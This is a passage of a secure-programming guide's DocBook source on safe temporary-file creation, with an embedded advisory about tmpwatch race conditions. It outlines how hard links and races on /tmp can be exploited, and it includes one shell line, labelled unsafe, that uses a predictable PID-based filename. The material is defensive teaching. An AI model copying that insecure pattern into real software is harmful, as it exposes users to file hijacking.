is to maintain a still-running tmpwatch process from the previous day
|
||
to exploit the condition. On systems where those programs are not
|
||
executed sequentially - for example, when both programs are listed
|
||
directly in /etc/crontab - the attack requires less precision.
|
||
|
||
|
||
4) Workarounds and fixes:
|
||
=====
|
||
|
||
Recommended immediate workaround is to discontinue the use of
|
||
'tmpwatch'
|
||
or equivalent to sweep /tmp directory if this service is not
|
||
necessary.
|
||
|
||
For applications that rely on TMPDIR or a similar environment
|
||
variable, setting it to a separate, not publicly writable directory
|
||
is often a viable solution. Note that not all applications honor
|
||
this setting.
|
||
|
||
In terms of a permanent solution, two different attack vectors have
|
||
to be addressed, as discussed in section 3:
|
||
|
||
1) unlink() race
|
||
|
||
The proper way to remove files in sticky-bit directories while
|
||
minimizing the risk is as follows:
|
||
|
||
a) lstat() the file to be removed
|
||
b) if owned by root, do not remove
|
||
c) if st_nlink > 1, do not remove
|
||
d) if owned by user, temporarily change privileges to this user
|
||
e) attempt unlink()
|
||
f) if failed, warn about a possible race condition
|
||
g) switch privileges back to root
|
||
|
||
With the exception of step c, this is implemented in 'stmpclean'.
|
||
Unfortunately, step c is crucial on systems that do not have
|
||
restricted /tmp kernel patches from Openwall
|
||
(http://www.openwall.com),
|
||
otherwise, there is a potential for fooling the algorithm by
|
||
supplying
|
||
a hard link to a file owned by the victim, as discussed in section
|
||
3.
|
||
|
||
This approach has several drawbacks - such as the fact root-owned
|
||
files
|
||
will not be removed. Other solution is to modify applications that
|
||
generate filenames on their own, and to modify mkstemp(), to
|
||
generate
|
||
names that are not only unique, but not feasible to predict.
|
||
|
||
Another suggestion is to implement a funlink() capability in the
|
||
kernel
|
||
of the operating system in question, to allow race-free file
|
||
removal,
|
||
thus removing the non-root ownership requirement for the method
|
||
described
|
||
above, and simplifying the approach. A skeleton patch to implement
|
||
funlink() semantics and make sure the file being removed is the
|
||
file
|
||
opened and fstat()ed previously is available at:
|
||
http://lcamtuf.coredump.cx/soft/linux-2.4-funlink.diff (this and
|
||
other patches are not endorsed by RAZOR in any way).
|
||
|
||
2) suspended process and 'legitimate' file removal
|
||
|
||
This issue is fairly difficult to address. The most basic idea is
|
||
to use a special naming scheme for temporary files to avoid
|
||
deletion -
|
||
unfortunately, this seems to defeat the purpose of using
|
||
tmpwatch-alike
|
||
solutions in the first place.
|
||
|
||
An alternative approach, which is to enforce separate temporary
|
||
directories for certain applications, either process-, session- or
|
||
uid-
|
||
based, is generally fairly controversial, and raises some
|
||
concerns.
|
||
Advisory separation is generally acceptable, but there are a
|
||
number of
|
||
applications that do not accept TMPDIR setting, and a widespread
|
||
practice
|
||
of using /tmp in in-house applications. Mandatory separation
|
||
(kernel
|
||
modification) raises compatibility concerns and is generally
|
||
approached
|
||
with skepticism - no implementation has become particularly
|
||
popular.
|
||
|
||
Ideally, implementers should carefully audit their sources. It is
|
||
recommended for privileged applications to use private temporary
|
||
directories for sensitive files, if possible; if using /tmp is
|
||
necessary,
|
||
extra caution has to be exercised to avoid referencing the file by
|
||
name.
|
||
Note that comparing the descriptor and a reopened file to verify
|
||
inode
|
||
numbers, creation times or file ownership is not sufficient - please
|
||
refer
|
||
to "Symlinks and Cryogenic Sleep" by Olaf Kirch, available at
|
||
http://www.opennet.ru/base/audit/17.txt.html .
|
||
|
||
It's worth noticing that 'tmpwatch' offers a -s option, which causes
|
||
the
|
||
program to run the 'fuser' command to prevent removal of files that
|
||
are
|
||
currently open. At first sight, this could be an effective way to
|
||
solve the
|
||
problem. Unfortunately, this is not true, since many applications
|
||
close the
|
||
file for a period of time before reopening (including logrotate and
|
||
mktemp(1)).
|
||
|
||
|
||
5) Credits and thanks
|
||
=====
|
||
|
||
Thanks to Solar Designer for interesting discussions on the subject,
|
||
to Matt Power for useful feedback, and to RAZOR team in general for
|
||
making
|
||
this publication possible.
|
||
|
||
-->
|
||
|
||
<para>
|
||
The general problem when creating files in these shared directories is that
|
||
you must guarantee that the filename you plan to use doesn't already
|
||
exist at time of creation, and atomically create the file.
|
||
Checking ``before'' you create the file doesn't work, because after the check
|
||
occurs, but before creation, another process can create that file with
|
||
that filename.
|
||
Using an ``unpredictable'' or ``unique'' filename doesn't work in
|
||
general, because another process can often repeatedly guess until it succeeds.
|
||
Once you create the file atomically, you must always use the returned
|
||
file descriptor
|
||
(or file stream, if created from the file descriptor using routines
|
||
like fdopen()).
|
||
You must never re-open the file, or use any operations that use the
|
||
filename as a parameter - always use the file descriptor or
|
||
associated stream.
|
||
Otherwise, the tmpwatch race issues noted above will cause problems.
|
||
You can't even create the file, close it, and re-open it, even if the
|
||
permissions limit who can open it.
|
||
Note that comparing the descriptor and a reopened file to verify inode
|
||
numbers, creation times or file ownership is not sufficient - please refer
|
||
to "Symlinks and Cryogenic Sleep" by Olaf Kirch.
|
||
<!--
|
||
http://www.opennet.ru/base/audit/17.txt.html .
|
||
-->
|
||
</para>
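<para>
To make the ``use the descriptor, not the name'' rule concrete, here is
a minimal sketch in C, assuming a POSIX system.
The helper name tighten_and_measure() is hypothetical, invented for this
illustration; the point is only that fchmod(2) and fstat(2) act on the
open file itself, whereas chmod(2) and stat(2) would look the name up
again and could be redirected by an attacker.
<programlisting width="72">
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Hypothetical helper: restrict an already-open temporary file to its
 * owner and report its size, touching it only through the descriptor.
 * Returns 0 on success, -1 on failure.
 */
int tighten_and_measure(int fd, off_t *size_out)
{
    struct stat st;

    /* fchmod(2), not chmod(2): no pathname is resolved again. */
    if (fchmod(fd, S_IRUSR | S_IWUSR) == -1) {
        return -1;
    }
    /* fstat(2), not stat(2) or lstat(2), for the same reason. */
    if (fstat(fd, &st) == -1) {
        return -1;
    }
    /* Extra precaution for this sketch: insist on a regular file. */
    if (!S_ISREG(st.st_mode)) {
        return -1;
    }
    *size_out = st.st_size;
    return 0;
}
```
]]>
</programlisting>
A caller would pass the descriptor returned by mkstemp(3) or open(2).
The S_ISREG check is an extra precaution added in this sketch, not
something the rule itself requires.
</para>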
|
||
|
||
<para>
|
||
Fundamentally, to create a temporary file in a shared (sticky) directory,
|
||
you must repeatedly: (1) create a ``random'' filename, (2) open it using
|
||
O_CREAT | O_EXCL and very narrow permissions (which atomically creates the
|
||
file, failing if a file by that name already exists),
|
||
and (3) stop repeating when the open succeeds.
|
||
</para>
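<para>
The three steps above can be sketched as follows.
This is an illustration under stated assumptions, not a replacement for
mkstemp(3): the helper name create_random_tempfile(), the ``tmp-''
prefix, the use of /dev/urandom as the randomness source, and the limit
of 100 attempts are all choices made for this example.
<programlisting width="72">
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

#define MAX_ATTEMPTS 100   /* arbitrary bound chosen for this sketch */

/* Read n random bytes from /dev/urandom (assumed to exist). */
static int random_bytes(unsigned char *buf, size_t n)
{
    int fd = open("/dev/urandom", O_RDONLY);
    size_t got = 0;

    if (fd == -1) {
        return -1;
    }
    while (got < n) {
        ssize_t r = read(fd, buf + got, n - got);
        if (r == -1 && errno == EINTR) {
            continue;
        }
        if (r <= 0) {
            close(fd);
            return -1;
        }
        got += (size_t) r;
    }
    close(fd);
    return 0;
}

/*
 * Hypothetical helper: create a new file in dir under a random name.
 * On success returns an open descriptor and leaves the name in path;
 * on failure returns -1.
 */
int create_random_tempfile(const char *dir, char *path, size_t path_len)
{
    static const char hex[] = "0123456789abcdef";
    int attempt;

    for (attempt = 0; attempt < MAX_ATTEMPTS; attempt++) {
        unsigned char r[8];
        char name[17];
        int i, len, fd;

        /* (1) create a random filename */
        if (random_bytes(r, sizeof r) == -1) {
            return -1;
        }
        for (i = 0; i < 8; i++) {
            name[2 * i] = hex[r[i] >> 4];
            name[2 * i + 1] = hex[r[i] & 15];
        }
        name[16] = '\0';
        len = snprintf(path, path_len, "%s/tmp-%s", dir, name);
        if (len < 0 || (size_t) len >= path_len) {
            errno = ENAMETOOLONG;
            return -1;
        }
        /* (2) atomic create; fails with EEXIST if the name is taken */
        fd = open(path, O_CREAT | O_EXCL | O_RDWR, S_IRUSR | S_IWUSR);
        /* (3) stop on success; retry only on a name collision */
        if (fd != -1) {
            return fd;
        }
        if (errno != EEXIST) {
            return -1;
        }
    }
    errno = EEXIST;
    return -1;
}
```
]]>
</programlisting>
The loop retries only when open(2) reports EEXIST; any other error (for
example, an unwritable directory) is returned to the caller rather than
retried forever.
</para>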
|
||
|
||
|
||
<para>
|
||
According to the 1997 ``Single Unix Specification'', the preferred
|
||
method for creating an arbitrary temporary file
|
||
(using the C interface) is tmpfile(3).
|
||
The tmpfile(3) function creates a temporary file
|
||
and opens a corresponding stream, returning that stream (or NULL on failure).
|
||
Unfortunately, the specification doesn't make any
|
||
guarantees that the file will be created securely.
|
||
In earlier versions of this book, I stated that I was concerned because
|
||
I could not assure myself that all implementations do this securely.
|
||
I've since found that older System V systems
|
||
have an insecure implementation of tmpfile(3) (as well as insecure
|
||
implementations of tmpnam(3) and tempnam(3)), so on at least some systems
|
||
it's absolutely useless.
|
||
<!-- http://www.gsp.com/cgi-bin/man.cgi?section=3&topic=tmpfile which
|
||
shows tmpfile(3) of BSD, November 17, 1993. -->
|
||
Library implementations of tmpfile(3) should securely create such files,
|
||
of course, but users don't always realize that their system libraries
|
||
have this security flaw, and sometimes they can't do anything about it.
|
||
</para>
|
||
|
||
<para>
|
||
Kris Kennaway recommends using mkstemp(3) for making temporary files
|
||
in general.
|
||
His rationale is that you should use well-known library functions to perform
|
||
this task instead of rolling your own functions, and that this function
|
||
has well-known semantics.
|
||
This is certainly a reasonable position.
|
||
I would add that, if you use mkstemp(3), be sure to use umask(2) to limit
|
||
the resulting temporary file permissions to only the owner.
|
||
This is because
|
||
some implementations of mkstemp(3) (basically older ones) make such
|
||
files readable and writable by all,
|
||
creating a condition in which an attacker can read or
|
||
write private data in this directory.
|
||
A minor nuisance is that mkstemp(3) doesn't directly support the
|
||
environment variables TMP or TMPDIR (as discussed below), so
|
||
if you want to support them you have to add code to do so.
|
||
Here's a program in C that demonstrates how to use mkstemp(3)
|
||
for this purpose, both directly and when adding support for TMP and TMPDIR:
|
||
|
||
<programlisting width="72">
|
||
<![CDATA[
|
||
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen(), strcpy(), strcat() */
#include <unistd.h>     /* unlink(), getuid(), geteuid(), ... */
#include <sys/types.h>
#include <sys/stat.h>   /* umask() */

void failure(const char *msg) {
  fprintf(stderr, "%s\n", msg);
  exit(1);
}

/*
 * Given a "pattern" for a temporary filename
 * (starting with the directory location and ending in XXXXXX),
 * create the file and return it.
 * This routine unlinks the file, so normally it won't appear in
 * a directory listing.
 * The pattern will be changed to show the final filename.
 */

FILE *create_tempfile(char *temp_filename_pattern)
{
  int temp_fd;
  mode_t old_mode;
  FILE *temp_file;

  old_mode = umask(077);  /* Create file with restrictive permissions */
  temp_fd = mkstemp(temp_filename_pattern);
  (void) umask(old_mode);
  if (temp_fd == -1) {
    failure("Couldn't open temporary file");
  }
  if (!(temp_file = fdopen(temp_fd, "w+b"))) {
    failure("Couldn't create temporary file's stream");
  }
  if (unlink(temp_filename_pattern) == -1) {
    failure("Couldn't unlink temporary file");
  }
  return temp_file;
}


/*
 * Given a "tag" (a relative filename ending in XXXXXX),
 * create a temporary file using the tag.  The file will be created
 * in the directory specified in the environment variables
 * TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise
 * it will be created in /tmp.  Note that root (and su'd to root)
 * _will_ use TMPDIR or TMP, if defined.
 *
 */
FILE *smart_create_tempfile(char *tag)
{
  char *tmpdir = NULL;
  char *pattern;
  FILE *result;

  if ((getuid()==geteuid()) && (getgid()==getegid())) {
    if (! ((tmpdir=getenv("TMPDIR")))) {
      tmpdir=getenv("TMP");
    }
  }
  if (!tmpdir) {tmpdir = "/tmp";}

  /* Room for the directory, a '/', the tag, and the trailing NUL */
  pattern = malloc(strlen(tmpdir)+strlen(tag)+2);
  if (!pattern) {
    failure("Could not malloc tempfile pattern");
  }
  strcpy(pattern, tmpdir);
  strcat(pattern, "/");
  strcat(pattern, tag);
  result = create_tempfile(pattern);
  free(pattern);
  return result;
}



int main(void) {
  int c;
  FILE *demo_temp_file1;
  FILE *demo_temp_file2;
  char demo_temp_filename1[] = "/tmp/demoXXXXXX";
  char demo_temp_filename2[] = "second-demoXXXXXX";

  demo_temp_file1 = create_tempfile(demo_temp_filename1);
  demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);
  fprintf(demo_temp_file2, "This is a test.\n");
  printf("Printing temporary file contents:\n");
  rewind(demo_temp_file2);
  while ( (c=fgetc(demo_temp_file2)) != EOF) {
    putchar(c);
  }
  putchar('\n');
  printf("Exiting; you'll notice that there are no temporary files on exit.\n");
  fclose(demo_temp_file1);
  fclose(demo_temp_file2);
  return 0;
}
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Kennaway states that if you can't use mkstemp(3),
|
||
then make yourself a directory using mkdtemp(3), which is protected
|
||
from the outside world.
|
||
However, as Michal Zalewski notes, this is a bad idea if there are
|
||
tmp cleaners in use; instead, use a directory inside the user's HOME.
|
||
Finally, if you really have to use the insecure mktemp(3), use lots of
|
||
X's - he suggests 10 (if your libc allows it) so that the filename can't
|
||
easily be guessed (using only 6 X's means that 5 are taken up by the
|
||
PID, leaving only one random character and allowing an attacker to
|
||
mount an easy race condition).
|
||
Note that this is fundamentally insecure, so you should normally not do this.
|
||
I add that you should avoid tmpnam(3) as well -
|
||
some of its uses aren't reliable when threads are present, and
|
||
it doesn't guarantee that it will work correctly after
|
||
TMP_MAX uses (yet most practical uses must be inside a loop).
|
||
</para>
|
||
|
||
<para>
|
||
In general, you should avoid using the insecure functions
|
||
such as mktemp(3) or tmpnam(3), unless you take specific measures to
|
||
counter their insecurities or test for a secure library implementation
|
||
as part of your installation routines.
|
||
If you ever want to make a file in /tmp or a world-writable directory
|
||
(or group-writable, if you don't trust the group) and don't want to
|
||
use mk*temp() (e.g. you intend for the file to be predictably named),
|
||
then <emphasis>always</emphasis> use the O_CREAT and O_EXCL flags to
|
||
open() and <emphasis>check the return value</emphasis>.
|
||
If you fail the open() call, then recover gracefully (e.g. exit).
|
||
<!-- Kennaway mentioned O_EXCL, but forgot O_CREAT -->
|
||
</para>
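<para>
For the predictable-name case, a minimal sketch might look like this
(create_predictable_file() is a hypothetical name used only here).
The important parts are the flag combination and the fact that a failure
is reported to the caller instead of being ignored.
<programlisting width="72">
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>

/*
 * Hypothetical helper: create a file with a fixed, predictable name.
 * Returns a descriptor, or -1 if the name already exists or the file
 * cannot be created for any other reason.
 */
int create_predictable_file(const char *path)
{
    int fd = open(path, O_CREAT | O_EXCL | O_WRONLY, S_IRUSR | S_IWUSR);

    if (fd == -1) {
        perror(path);   /* say why, and let the caller give up cleanly */
    }
    return fd;
}
```
]]>
</programlisting>
Because O_EXCL is combined with O_CREAT, the call also fails if the name
already exists as a symbolic link, whatever the link points to.
</para>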
|
||
|
||
<para>
|
||
The GNOME programming guidelines recommend the following C code when
|
||
creating filesystem objects in shared (temporary) directories
|
||
to securely open temporary files [Quintero 2000]:
|
||
<programlisting width="68">
|
||
char *filename;
|
||
int fd;
|
||
|
||
do {
|
||
  filename = tempnam (NULL, "foo");
  fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
  free (filename);
|
||
} while (fd == -1);
|
||
</programlisting>
|
||
Note that, although the insecure function tempnam(3) is being used, it
|
||
is wrapped inside a loop using O_CREAT and O_EXCL to counteract its
|
||
security weaknesses, so this use is okay.
|
||
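Note that you need to free() the filename.
Also note that, as written, the loop never terminates if open() keeps failing
for a reason other than a name collision (for example, an unwritable
directory); robust code should check errno and give up unless it is EEXIST.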
|
||
You should close() and unlink() the file after you are done.
|
||
If you want to use the Standard C I/O library,
|
||
you can use fdopen() with mode "w+b"
|
||
to transform the file descriptor into a FILE *.
|
||
Note that this approach won't work over
|
||
NFS version 2 (v2) systems, because older
|
||
NFS doesn't correctly support O_EXCL.
|
||
Note that one minor disadvantage to this approach is that, since
|
||
tempnam can be used insecurely, various compilers and security scanners
|
||
may give you spurious warnings about its use.
|
||
This isn't a problem with mkstemp(3).
|
||
<!-- They also say you can use tmpfile() to do it in one step; I want
|
||
to verify this before saying so. I'm concerned that some
|
||
implementations may not "do it correctly", and it's better to
|
||
re-implement than be insecure. -->
|
||
<!-- http://developer.gnome.org/doc/guides/programming-guidelines/security.html -->
|
||
</para>
|
||
|
||
<para>
|
||
If you need a temporary file in a shell script, you're probably
|
||
best off using pipes, using a local directory (e.g., something inside the
|
||
user's home directory), or in some cases using the current directory.
|
||
That way, there's no sharing unless the user permits it.
|
||
If you really want/need the temporary file
|
||
to be in a shared directory like /tmp, do
|
||
<emphasis>not</emphasis> use the traditional shell
|
||
technique of using the process id in a template and just creating the file
|
||
using normal operations like ">".
|
||
Shell scripts can use "$$" to indicate the PID, but the
|
||
PID can be easily determined or guessed by an attacker,
|
||
who can then pre-create files or links with the same name.
|
||
Thus the following "typical" shell script is <emphasis>unsafe</emphasis>:
|
||
<programlisting width="72">
|
||
<![CDATA[
|
||
echo "This is a test" > /tmp/test$$ # DON'T DO THIS.
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
|
||
<para>
|
||
If you need a temporary file or directory
|
||
in a shell script, and you want it in /tmp,
|
||
a solution sometimes suggested is to use
|
||
mktemp(1), which is intended for use in shell scripts
|
||
(note that mktemp(1) and mktemp(3) are different things).
|
||
However, as Michal Zalewski notes, this is insecure in many environments
|
||
that run tmp cleaners;
|
||
the problem is that when a privileged program sweeps through a temporary
|
||
directory, it will probably expose a race condition.
|
||
Even if this weren't true, I do not recommend using shell scripts that
|
||
create temporary files in shared directories;
|
||
creating such files in private directories or using pipes instead is
|
||
generally preferable, even if you're sure your tmpwatch program is okay
|
||
(or that you have no local users).
|
||
If you must use mktemp(1), note that
|
||
mktemp(1) takes a template, then
|
||
creates a file or directory using O_EXCL and returns the resulting name;
|
||
thus, mktemp(1) won't work on NFS version 2 filesystems.
|
||
Here are some examples of correct use of mktemp(1) in Bourne shell scripts;
|
||
these examples are straight from the mktemp(1) man page:
|
||
<programlisting width="72">
|
||
<![CDATA[
|
||
# Simple use of mktemp(1), where the script should quit
|
||
# if it can't get a safe temporary file.
|
||
# Note that this will be INSECURE on many systems, since they use
|
||
# tmpwatch-like programs that will erase "old" files and expose race
|
||
# conditions.
|
||
|
||
TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
|
||
echo "program output" >> $TMPFILE
|
||
|
||
# Simple example, if you want to catch the error:
|
||
|
||
TMPFILE=`mktemp -q /tmp/$0.XXXXXX`
|
||
if [ $? -ne 0 ]; then
|
||
        echo "$0: Can't create temp file, exiting..."
        exit 1
|
||
fi
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Perl programmers should use File::Temp, which tries to
|
||
provide a cross-platform means of securely creating temporary files.
|
||
However, read the documentation carefully on how to use it properly first;
|
||
it includes interfaces to unsafe functions as well.
|
||
I suggest explicitly setting its safe_level to HIGH; this will invoke
|
||
additional security checks.
|
||
<ulink url="http://search.cpan.org/author/JHI/perl-5.8.0/lib/File/Temp.pm">
|
||
The Perl 5.8 documentation of File::Temp is available on-line</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Don't reuse a temporary filename (i.e. remove and recreate it),
|
||
no matter how you obtained the ``secure'' temporary filename in the
|
||
first place.
|
||
An attacker can observe the original filename
|
||
and hijack it before you recreate it the second time.
|
||
And of course, always use appropriate file permissions.
|
||
For example, only allow world/group access
|
||
if you need the world or a group to access the file, otherwise
|
||
keep it mode 0600 (i.e., only the owner can read or write it).
|
||
</para>
|
||
|
||
<para>
|
||
Clean up after yourself, either by using an exit handler, or making
|
||
use of UNIX filesystem semantics and unlink()ing the file immediately
|
||
after creation so the directory entry goes away but the file itself
|
||
remains accessible until the last file descriptor pointing to it is
|
||
closed. You can then continue to access it within your program by
|
||
passing around the file descriptor.
|
||
Unlinking the file has a lot of advantages for code maintenance:
|
||
the file is automatically deleted, no matter how your program crashes.
|
||
It also decreases the likelihood that a maintainer will insecurely
|
||
use the filename (they need to use the file descriptor instead).
|
||
The one minor problem with immediate unlinking is that it makes it slightly
|
||
harder for administrators to see how disk space is being used, since
|
||
they can't simply look at the file system by name.
|
||
</para>
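<para>
If you choose the exit-handler route, a sketch along these lines is one
way to do it with the standard atexit(3) facility.
The helper names remove_at_exit() and remove_temp_file() are
hypothetical, and the example tracks only a single file to stay short.
<programlisting width="72">
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static char temp_path[4096];    /* name to remove at exit, if any */
static int handler_registered;

/* Exit handler: remove the remembered file, if there is one. */
static void remove_temp_file(void)
{
    if (temp_path[0] != '\0') {
        (void) unlink(temp_path);
        temp_path[0] = '\0';
    }
}

/*
 * Hypothetical helper: remember path and arrange for it to be
 * unlinked when the program calls exit() or returns from main().
 * Returns 0 on success, -1 if the path is too long or atexit() fails.
 */
int remove_at_exit(const char *path)
{
    if (strlen(path) >= sizeof temp_path) {
        return -1;
    }
    if (!handler_registered) {
        if (atexit(remove_temp_file) != 0) {
            return -1;
        }
        handler_registered = 1;
    }
    strcpy(temp_path, path);
    return 0;
}
```
]]>
</programlisting>
Keep in mind that handlers registered with atexit(3) run only on a
normal exit(3) or return from main(); they are skipped if the process is
killed by a signal or calls abort(3) or _exit(2), which is one reason
immediate unlinking is the more robust choice.
</para>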
|
||
|
||
<para>
|
||
You might consider ensuring that your code for Unix-like systems
|
||
respects the environment variables TMP or TMPDIR
|
||
if the provider of these variable values is trusted.
|
||
By doing so, you make it possible for users to move their temporary
|
||
files into an unshared directory (eliminating the problems discussed here),
|
||
such as a subdirectory inside their home directory.
|
||
Recent versions of Bastille can set these variables to reduce the sharing
|
||
between users.
|
||
Unfortunately, many users set TMP or TMPDIR to a shared directory
|
||
(say /tmp), so your secure program must still
|
||
correctly create temporary files even if these environment variables
|
||
are set.
|
||
This is one advantage of the GNOME approach, since at least on some
|
||
systems tempnam(3) automatically uses TMPDIR, while
|
||
the mkstemp(3) approach requires more code to do this.
|
||
Please don't create yet more environment variables for temporary directories
|
||
(such as TEMP), and in particular don't create a different environment
|
||
name for each application (e.g., don't use "MYAPP_TEMP").
|
||
Doing so greatly complicates managing systems,
|
||
and users wanting a special temporary directory for a specific
|
||
application can just set the environment variable specially
|
||
when running that particular application.
|
||
Of course, if these environment variables might have been set by an
|
||
untrusted source, you should ignore them - which you'll do anyway
|
||
if you follow the advice in
|
||
<xref linkend="env-var-solution">.
|
||
</para>
|
||
|
||
<para>
|
||
These techniques don't work if the temporary directory is remotely
|
||
mounted using NFS version 2 (NFSv2), because NFSv2 doesn't properly
|
||
support O_EXCL.
|
||
See <xref linkend="locking-using-files"> for more information.
|
||
NFS version 3 and later properly support O_EXCL; the simple solution
|
||
is to ensure that temporary directories are either local or, if mounted
|
||
using NFS, mounted using NFS version 3 or later.
|
||
There is a technique for safely creating temporary files on NFS v2,
|
||
involving the use of link(2) and stat(2), but it's complex; see
|
||
<xref linkend="locking-using-files"> which has more information about this.
|
||
</para>
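<para>
The core of the link(2)-and-stat technique can be sketched as follows.
This is a simplified illustration, not the full procedure: the helper
name create_with_link() and the ``.claim.'' naming scheme are invented
here, and the sketch assumes that no other user can create files under
the unique intermediate name.
<programlisting width="72">
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Hypothetical helper: create the file target inside dir without
 * relying on O_EXCL.  Returns an open descriptor if we created
 * target, or -1 if the name was already taken or an error occurred.
 */
int create_with_link(const char *dir, const char *target)
{
    char host[256], unique[1024];
    struct stat st;
    int fd, len;

    if (gethostname(host, sizeof host) == -1) {
        return -1;
    }
    host[sizeof host - 1] = '\0';
    /* A name unique across the machines sharing the filesystem */
    len = snprintf(unique, sizeof unique, "%s/.claim.%s.%ld",
                   dir, host, (long) getpid());
    if (len < 0 || (size_t) len >= sizeof unique) {
        return -1;
    }
    fd = open(unique, O_CREAT | O_RDWR, S_IRUSR | S_IWUSR);
    if (fd == -1) {
        return -1;
    }
    /* link(2) is atomic; judge the outcome by the link count. */
    (void) link(unique, target);
    if (fstat(fd, &st) == -1 || st.st_nlink != 2) {
        (void) unlink(unique);
        (void) close(fd);
        return -1;
    }
    (void) unlink(unique);  /* target is now the only name */
    return fd;
}
```
]]>
</programlisting>
The sketch decides success by the link count rather than by the return
value of link(2), since over NFS the reply can be lost even though the
link was made.
</para>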
|
||
|
||
<para>
|
||
As an aside, it's worth noting that
|
||
FreeBSD has recently changed the mk*temp() family to get rid of
|
||
the PID component of the filename and replace the entire thing with
|
||
base-62 encoded randomness. This drastically raises the number of
|
||
possible temporary files for the "default" usage of 6 X's, meaning
|
||
that even mktemp(3) with 6 X's is reasonably (probabilistically) secure
|
||
against guessing, except under very frequent usage.
|
||
However, if you also follow the guidance here, you'll eliminate the
|
||
problem they're addressing.
|
||
</para>
|
||
|
||
<para>
|
||
Much of this information on temporary files was derived from
|
||
<ulink url="http://lwn.net/2000/1221/a/sec-tmp.php3">Kris Kennaway's
|
||
posting to Bugtraq about temporary files on December 15, 2000</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
I should note that the Openwall Linux patch from
|
||
<ulink url="http://www.openwall.com/linux/">http://www.openwall.com/linux/</ulink>
|
||
includes an optional ``temporary file directory'' policy that counters
|
||
many temporary file based attacks.
|
||
The Linux Security Module (LSM) project includes an "owlsm" module
|
||
that implements some of the OpenWall ideas, so
|
||
Linux kernels with LSM can quickly insert these rules into a running system.
|
||
When enabled, it has two protections:
|
||
<itemizedlist>
|
||
<listitem>
|
||
<para>
|
||
Hard links: Processes may not make hard links to files in certain cases.
|
||
The OpenWall documentation states that
|
||
"Processes may not make hard links to files they do not have write access to."
|
||
In the LSM version, the rules are as follows:
|
||
if both the process' uid and fsuid (usually the same as the euid) are
different from the linked-to-file's uid, the
process uid is not root, and the process lacks the FOWNER capability, then
the hard link is forbidden.
The check against the process uid may be dropped someday
(it is a work-around for the atd(8) program), at which point the rule
would be:
if the process' fsuid (usually the same as the euid) is
different from the linked-to-file's uid
and the process lacks the FOWNER capability, then the hard link is forbidden.
|
||
In other words, you can only create hard links to files you own,
|
||
unless you have the FOWNER capability.
|
||
|
||
<!-- do_owlsm_link -->
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
<para>
|
||
Symbolic links (symlinks): Certain symlinks are not followed.
|
||
The original OpenWall documentation states that
|
||
"root processes may not follow symlinks that
|
||
are not owned by root", but the actual rules (from looking at the code)
|
||
are more complicated.
|
||
In the LSM version, if the directory is sticky ("+t" mode, used in shared
|
||
directories like /tmp), symlinks are not followed if the symlink was
|
||
created by anyone other than either the owner of the directory or
|
||
the current process' fsuid (which is usually the effective uid).
|
||
<!-- see do_owlsm_follow_link -->
|
||
</para>
|
||
</listitem>
|
||
</itemizedlist>
|
||
Many systems do not implement this Openwall policy, so you can't depend on
it to protect your system in general.
|
||
However, I encourage using this policy on your own system, and
|
||
please make sure that your application will work when this policy is in place.
|
||
</para>
|
||
|
||
<!-- ???: I need to completely rewrite this race condition section -->
|
||
|
||
<!-- Not quite the right idea:
|
||
You can't even just check to see if the given file is a symbolic link;
|
||
if it's owned by an untrusted user, the user could change this after
|
||
the check.
|
||
One possible tool is the O_NOFOLLOW option for open(), a
|
||
FreeBSD extension also supported by Linux; this option says to not
|
||
follow symbolic links if the link the final portion of the path.
|
||
Unfortunately at this time this option is not portable.
|
||
-->
|
||
|
||
</sect3>
|
||
|
||
|
||
</sect2>
|
||
|
||
|
||
<sect2 id="locking">
|
||
<title>Locking</title>
|
||
|
||
<para>
|
||
There are often situations in which a program must ensure that it has
|
||
exclusive rights to something (e.g., a file, a device, and/or
|
||
existence of a particular server process).
|
||
Any system which locks resources must deal with the standard problems
|
||
of locks, namely, deadlocks (``deadly embraces''), livelocks,
|
||
and releasing ``stuck'' locks if a program doesn't clean up its locks.
|
||
A deadlock can occur if programs are stuck waiting for each other to
|
||
release resources.
|
||
For example, a deadlock would occur if
|
||
process 1 locks resource A and waits for resource B,
|
||
while process 2 locks resource B and waits for resource A.
|
||
Many deadlocks can be prevented by simply requiring all processes
|
||
that lock multiple resources to lock them
|
||
in the same order (e.g., alphabetically by lock name).
|
||
</para>
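<para>
As a minimal sketch of that ordering rule (the function names here are
hypothetical, chosen only for illustration), a program could sort the names
of the locks it needs before acquiring any of them, so that every
cooperating process takes them in the same alphabetical order:
</para>

```c
#include <stdlib.h>
#include <string.h>

/* Comparator for qsort(): orders lock names alphabetically (by strcmp). */
static int compare_lock_names(const void *a, const void *b)
{
    const char *const *left = a;
    const char *const *right = b;
    return strcmp(*left, *right);
}

/*
 * Sort an array of lock names so that every process acquires them in
 * the same order, whatever order the caller happened to list them in.
 */
void sort_lock_names(const char **names, size_t count)
{
    qsort(names, count, sizeof(names[0]), compare_lock_names);
}
```

<para>
A caller would pass its list of lock names to sort_lock_names() and then
acquire the locks in the resulting order, using whatever locking mechanism
it has chosen.
</para>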
|
||
|
||
<sect3 id="locking-using-files">
|
||
<title>Using Files as Locks</title>
|
||
|
||
<para>
|
||
On Unix-like systems resource locking has traditionally been done by creating
|
||
a file to indicate a lock, because this is very portable.
|
||
